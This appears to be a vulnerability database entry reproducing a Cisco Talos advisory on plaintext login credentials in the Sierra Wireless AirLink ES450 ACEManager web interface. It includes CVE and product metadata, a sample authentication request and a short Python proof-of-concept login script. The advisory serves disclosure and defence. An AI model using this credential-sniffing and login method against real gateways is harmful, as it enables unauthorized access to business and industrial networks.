ID
VAR-E-201904-0009
CVE
cve_id: | CVE-2018-4067 | Trust: 0.8 |
cve_id: | CVE-2018-4065 | Trust: 0.8 |
cve_id: | CVE-2018-4063 | Trust: 0.8 |
cve_id: | CVE-2018-4069 | Trust: 0.8 |
cve_id: | CVE-2018-4062 | Trust: 0.8 |
cve_id: | CVE-2018-4066 | Trust: 0.8 |
cve_id: | CVE-2018-4061 | Trust: 0.8 |
TITLE
Sierra Wireless AirLink ES450 ACEManager Information Exposure
Trust: 0.5
DESCRIPTION
An information disclosure vulnerability exists in the ACEManager authentication functionality of Sierra Wireless AirLink ES450 FW 4.9.3. The ACEManager authentication functionality is done in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device to capitalize on this vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | sierra | model: | wireless airlink es450 | scope: | - | version: | - | Trust: 1.0 |
vendor: | sierra | model: | wireless airlink es450 acemanager template load.cgi | scope: | - | version: | - | Trust: 0.5 |
vendor: | sierra | model: | wireless airlink es450 acemanager upload.cgi | scope: | - | version: | - | Trust: 0.5 |
vendor: | sierra | model: | wireless airlink es450 acemanager iplogging.cgi | scope: | - | version: | - | Trust: 0.5 |
vendor: | sierra | model: | wireless airlink es450 acemanager ping result.cgi | scope: | - | version: | - | Trust: 0.5 |
vendor: | sierra | model: | wireless airlink es450 acemanager | scope: | - | version: | - | Trust: 0.5 |
vendor: | sierra | model: | wireless airlink rv50x aleos | scope: | eq | version: | 4.11.2 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink rv50 aleos | scope: | eq | version: | 4.11.2 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink mp70e aleos | scope: | eq | version: | 4.11.2 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink mp70 aleos | scope: | eq | version: | 4.11.2 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink lx60 aleos | scope: | eq | version: | 4.10 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink lx40 aleos | scope: | eq | version: | 4.11.1 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink ls300 aleos | scope: | eq | version: | 4.4.8 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink gx450 aleos | scope: | eq | version: | 4.9.3 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink gx440 aleos | scope: | eq | version: | 4.4.8 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink gx400 aleos | scope: | eq | version: | 4.4.8 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink es450 aleos | scope: | eq | version: | 4.9.3 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink es440 aleos | scope: | eq | version: | 4.4.8 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink gx450 aleos 4.9.4.p09 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink gx450 aleos | scope: | ne | version: | 4.9.4 | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink es450 aleos 4.9.4.p09 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | sierra | model: | wireless airlink es450 aleos | scope: | ne | version: | 4.9.4 | Trust: 0.3 |
EXPLOIT
Talos Vulnerability Report
TALOS-2018-0754
Sierra Wireless AirLink ES450 ACEManager Information Exposure Vulnerability
April 25, 2019
CVE Number
CVE-2018-4069
Summary
An information disclosure vulnerability exists in the ACEManager authentication functionality of Sierra Wireless AirLink ES450 FW 4.9.3. The ACEManager authentication functionality is done in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device to capitalize on this vulnerability.
Tested Versions
Sierra Wireless AirLink ES450 FW 4.9.3
Product URLs
https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/
CVSSv3 Score
5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE
CWE-311: Missing Encryption of Sensitive Data
Details
Sierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.
ACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.
The authentication of ACEManager utilizes plaintext credentials for communication between the client and webserver. This plaintext authentication can be sniffed from the network and utilized to log into the device.
Authentication Request
POST /xml/Connect.xml HTTP/1.1
Host: 192.168.13.31:9191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.13.31:9191/
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 129
Cookie: token=1774ad8f3ee180cdd62e29611e1efc9c
Connection: close
<request xmlns="urn:acemanager">
<connect>
<login>user</login>
<password><![CDATA[password012]]></password>
</connect>
</request>
These vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.
Exploit Proof of Concept
#!/usr/bin/env python
#Author : Carl Hurd, Cisco Talos
import sys
import requests
from requests_toolbelt.utils import dump
def auth(ip, port, password):
data = """<request xmlns="urn:acemanager">
<connect>
<login>user</login>
<password><![CDATA[{}]]></password>
</connect>
</request>""".format(password)
response = requests.post("http://"+ip+":"+port+"/xml/Connect.xml", data=data)
data = dump.dump_all(response) print(data.decode('utf-8'))
def main():
if len(sys.argv) < 4 or len(sys.argv) > 4:
print("Usage : {} [ip address] [port] [password of user]".format(sys.argv[0]))
sys.exit(0)
ip = sys.argv[1]
port = sys.argv[2]
password = sys.argv[3]
auth(ip, port, password)
if __name__ == "__main__":
main()
Timeline
2018-12-14 - Vendor disclosure
2018-12-17 - Vendor acknowledged
2019-01-08 - Discussion to review vendor's analysis of issues
2019-03-26 - Vendor established timelines for fix/public disclosure
2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756
2019-04-25 - Public Release
Credit
Discovered by Carl Hurd of Cisco Talos.
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
info disclosure
Trust: 1.0
TAGS
tag: | exploit | Trust: 3.5 |
tag: | web | Trust: 3.0 |
tag: | cgi | Trust: 2.0 |
tag: | info disclosure | Trust: 1.0 |
tag: | code execution | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
tag: | javascript | Trust: 0.5 |
tag: | xss | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
Cisco Talos, Carl Hurd
Trust: 0.5
EXTERNAL IDS
db: | NVD | id: | CVE-2018-4067 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4065 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4063 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4069 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4062 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4066 | Trust: 0.8 |
db: | NVD | id: | CVE-2018-4061 | Trust: 0.8 |
db: | PACKETSTORM | id: | 152654 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152652 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152647 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152648 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152646 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152650 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152651 | Trust: 0.5 |
db: | TALOS | id: | TALOS-2018-0747 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0754 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0750 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0752 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0751 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0748 | Trust: 0.3 |
db: | TALOS | id: | TALOS-2018-0746 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-19-122-03 | Trust: 0.3 |
db: | BID | id: | 108147 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4069 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4067 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4062 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4063 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4061 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4065 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-4066 | Trust: 0.5 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/es440-firmware/es440-firmware-list/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,4,-d-,8-release-notes/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/rv50/rv50-firmware-list/ | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0750 | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_reference_docs/technical-bulletin/sierra-wireless-technical-bulletin---swi-psa-2019-003/ | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0748 | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0752 | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0746 | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/es450/es450-firmware-package-list/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/mp70/mp70-firmware-list/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,11,-d-,2-release-notes/ | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0754 | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/ls300-firmware/ls300-firmware-list/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/gx400-firmware/gx400-firmware-list/ | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0747 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-19-122-03 | Trust: 0.3 |
url: | https://www.sierrawireless.com/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/~/media/support_downloads/airlink/docs/technical%20bulletin/swi-psa-2019-003%20-%20talos%20cves%20-%2030apr2019.ashx?la=en | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_downloads/gx450/gx450-firmware-list/ | Trust: 0.3 |
url: | https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,9,-d-,4-release-notes/ | Trust: 0.3 |
url: | https://www.talosintelligence.com/reports/talos-2018-0751 | Trust: 0.3 |
SOURCES
db: | BID | id: | 108147 |
db: | PACKETSTORM | id: | 152654 |
db: | PACKETSTORM | id: | 152652 |
db: | PACKETSTORM | id: | 152647 |
db: | PACKETSTORM | id: | 152648 |
db: | PACKETSTORM | id: | 152646 |
db: | PACKETSTORM | id: | 152650 |
db: | PACKETSTORM | id: | 152651 |
LAST UPDATE DATE
2022-07-27T09:56:06.126000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 108147 | date: | 2019-04-25T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 108147 | date: | 2019-04-25T00:00:00 |
db: | PACKETSTORM | id: | 152654 | date: | 2019-04-27T17:25:19 |
db: | PACKETSTORM | id: | 152652 | date: | 2019-04-27T17:20:43 |
db: | PACKETSTORM | id: | 152647 | date: | 2019-04-26T21:11:11 |
db: | PACKETSTORM | id: | 152648 | date: | 2019-04-26T21:01:11 |
db: | PACKETSTORM | id: | 152646 | date: | 2019-04-26T19:32:22 |
db: | PACKETSTORM | id: | 152650 | date: | 2019-04-26T21:01:11 |
db: | PACKETSTORM | id: | 152651 | date: | 2019-04-26T22:22:22 |